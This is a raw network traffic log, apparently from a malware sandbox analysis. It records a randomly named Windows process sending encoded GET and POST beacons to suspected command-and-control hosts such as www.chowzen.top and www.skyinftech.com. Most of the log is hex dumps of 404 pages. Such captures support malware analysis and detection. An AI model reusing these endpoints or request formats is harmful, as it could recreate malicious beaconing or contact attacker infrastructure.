Jun 13, 2024 11:05:47.664129019 CEST	1236	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1238 date: Thu, 13 Jun 2024 09:05:45 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
Jun 13, 2024 11:05:47.664287090 CEST	240	IN	Data Raw: 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	49743	103.138.88.32	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:05:49.182845116 CEST	453	OUT	GET /gwqo/?fD=okHduu9bAgMM6c4GdEVgS1G+EVcXjBymZ/AEM3aFVKlZzziUwfhKvtqGWgkRboMd4eWK0/sAAMCd+0rGXOBNsjDOL2SA50vrXr2QK+Wy7YL6dLNwijbZiWqDBeKnevfe7g==&j0=vTcl_2X8QJ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.skyinftech.com Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Jun 13, 2024 11:05:50.211420059 CEST	1236	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1238 date: Thu, 13 Jun 2024 09:05:47 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
Jun 13, 2024 11:05:50.211565018 CEST	240	IN	Data Raw: 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	49744	162.0.213.72	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:05:56.014115095 CEST	706	OUT	POST /fv92/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.chowzen.top Content-Length: 203 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.chowzen.top Referer: http://www.chowzen.top/fv92/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0 Data Raw: 66 44 3d 2f 4b 54 4f 63 49 52 78 33 35 38 53 32 55 30 5a 72 48 44 30 74 57 6b 32 36 2b 79 36 67 7a 37 54 6f 6a 56 55 30 58 4c 67 36 39 51 64 67 6a 4d 6f 78 6b 71 49 54 38 32 4f 78 4d 66 6d 4b 50 4e 34 69 38 39 6f 6c 5a 74 71 72 4f 6e 51 6b 67 30 54 59 59 79 31 73 31 7a 35 32 2b 5a 48 54 45 43 74 6a 33 61 42 64 58 4a 61 31 2b 34 32 32 54 68 36 63 4a 61 77 30 45 32 45 6b 4d 51 34 69 43 2b 73 46 7a 47 4f 57 4f 70 42 6e 45 37 4a 4f 69 5a 57 69 71 75 32 6c 4c 42 55 6a 67 42 45 4f 68 47 6f 4a 49 58 2f 41 6a 66 70 52 6a 65 79 41 42 49 58 37 4a 46 68 4d 70 4d 52 45 6f 33 42 2b 6f 31 78 71 4b 73 72 42 46 51 3d Data Ascii: fD=/KTOcIRx358S2U0ZrHD0tWk26+y6gz7TojVU0XLg69QdgjMoxkqIT82OxMfmKPN4i89olZtqrOnQkg0TYYy1s1z52+ZHTECtj3aBdXJa1+422Th6cJaw0E2EkMQ4iC+sFzGOWOpBnE7JOiZWiqu2lLBUjgBEOhGoJIX/AjfpRjeyABIX7JFhMpMREo3B+o1xqKsrBFQ=
Jun 13, 2024 11:05:56.700509071 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 13 Jun 2024 09:05:56 GMT Server: Apache Content-Length: 16026 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
Jun 13, 2024 11:05:56.700550079 CEST	1236	IN	Data Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37 Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380.857,346.
Jun 13, 2024 11:05:56.700661898 CEST	1236	IN	Data Raw: 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d Data Ascii: <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149
Jun 13, 2024 11:05:56.700699091 CEST	1236	IN	Data Raw: 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: 0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" strok
Jun 13, 2024 11:05:56.700769901 CEST	848	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d Data Ascii: </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="489.555" y1="299.765" x2="489.555" y2="308.124" />
Jun 13, 2024 11:05:56.700807095 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 Data Ascii: </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" />
Jun 13, 2024 11:05:56.700839996 CEST	1236	IN	Data Raw: 2e 31 34 36 22 20 78 32 3d 22 34 37 36 2e 33 37 38 22 20 79 32 3d 22 34 31 31 2e 31 34 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 Data Ascii: .146" x2="476.378" y2="411.146" /> </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10"
Jun 13, 2024 11:05:56.700875998 CEST	424	IN	Data Raw: 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 32 38 33 2e 35 32 31 22 20 63 79 3d 22 35 36 38 2e 30 33 33 22 20 72 3d 22 37 2e Data Ascii: p="round" stroke-miterlimit="10" cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="413.618" cy="4
Jun 13, 2024 11:05:56.700910091 CEST	1236	IN	Data Raw: 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 32 35 33 2e 32 39 22 20 63 79 3d 22 32 32 39 2e 32 34 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 Data Ascii: l="#0E0620" cx="253.29" cy="229.24" r="2.651" /> <circle fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620"
Jun 13, 2024 11:05:56.700947046 CEST	212	IN	Data Raw: 32 32 31 6c 35 32 2e 33 34 39 2c 31 34 2e 30 33 35 63 31 34 2e 35 30 34 2c 33 2e 38 38 39 2c 32 33 2e 31 31 2c 31 38 2e 37 39 39 2c 31 39 2e 32 32 31 2c 33 33 2e 33 30 33 6c 2d 31 35 2e 36 39 34 2c 35 38 2e 35 33 37 0a 09 09 09 43 33 36 30 2e 36 Data Ascii: 221l52.349,14.035c14.504,3.889,23.11,18.799,19.221,33.303l-15.694,58.537C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E062
Jun 13, 2024 11:05:56.708893061 CEST	1236	IN	Data Raw: 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3d 22 72 6f 75 6e 64 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: 0" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" x1="323.396" y1="236.625" x2="295.285" y2="353.753" /> <circle fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	49745	162.0.213.72	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:05:58.545034885 CEST	726	OUT	POST /fv92/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.chowzen.top Content-Length: 223 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.chowzen.top Referer: http://www.chowzen.top/fv92/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0 Data Raw: 66 44 3d 2f 4b 54 4f 63 49 52 78 33 35 38 53 32 31 6b 5a 34 52 4c 30 38 47 6b 31 31 65 79 36 72 54 37 49 6f 6a 70 55 30 57 2f 4b 36 50 30 64 67 44 63 6f 77 68 57 49 64 63 32 4f 2b 73 65 74 55 2f 4e 7a 69 38 42 4b 6c 5a 52 71 72 50 44 51 6b 69 38 54 59 76 65 36 74 6c 7a 37 74 75 5a 42 4d 55 43 74 6a 33 61 42 64 58 63 50 31 36 55 32 32 6a 78 36 54 4c 69 33 76 6b 32 48 6a 4d 51 34 7a 53 2b 77 46 7a 47 77 57 50 31 76 6e 43 2f 4a 4f 6a 70 57 68 34 47 33 75 4c 41 52 6e 67 41 45 48 79 6a 4d 48 71 6a 66 42 68 6d 72 50 69 61 49 42 33 6c 39 68 72 4e 4a 66 4a 67 70 55 37 2f 32 76 59 55 59 77 70 38 62 66 53 48 51 36 49 65 4c 59 47 63 30 45 67 30 46 35 37 75 51 45 4c 76 2b Data Ascii: fD=/KTOcIRx358S21kZ4RL08Gk11ey6rT7IojpU0W/K6P0dgDcowhWIdc2O+setU/Nzi8BKlZRqrPDQki8TYve6tlz7tuZBMUCtj3aBdXcP16U22jx6TLi3vk2HjMQ4zS+wFzGwWP1vnC/JOjpWh4G3uLARngAEHyjMHqjfBhmrPiaIB3l9hrNJfJgpU7/2vYUYwp8bfSHQ6IeLYGc0Eg0F57uQELv+
Jun 13, 2024 11:05:59.218084097 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 13 Jun 2024 09:05:59 GMT Server: Apache Content-Length: 16026 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
Jun 13, 2024 11:05:59.218141079 CEST	1236	IN	Data Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37 Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380.857,346.
Jun 13, 2024 11:05:59.218177080 CEST	1236	IN	Data Raw: 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d Data Ascii: <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149
Jun 13, 2024 11:05:59.218210936 CEST	1236	IN	Data Raw: 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: 0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" strok
Jun 13, 2024 11:05:59.218249083 CEST	848	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d Data Ascii: </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="489.555" y1="299.765" x2="489.555" y2="308.124" />
Jun 13, 2024 11:05:59.218287945 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 Data Ascii: </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" />
Jun 13, 2024 11:05:59.218322039 CEST	212	IN	Data Raw: 2e 31 34 36 22 20 78 32 3d 22 34 37 36 2e 33 37 38 22 20 79 32 3d 22 34 31 31 2e 31 34 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 Data Ascii: .146" x2="476.378" y2="411.146" /> </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-mi
Jun 13, 2024 11:05:59.218353033 CEST	1236	IN	Data Raw: 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 35 38 38 2e 39 37 37 22 20 63 79 3d 22 32 35 35 2e 39 37 38 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 Data Ascii: terlimit="10" cx="588.977" cy="255.978" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="450.066" cy="320.259" r="7.952" /
Jun 13, 2024 11:05:59.218408108 CEST	212	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 34 31 33 2e 36 31 38 22 20 63 79 3d 22 34 38 32 2e 33 38 37 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: cx="413.618" cy="482.387" r="7.952" /> </g> <g id="circlesSmall"> <circle fill="#0E0620" cx="549.879" cy="296.402" r="2.651" /> <circle fil
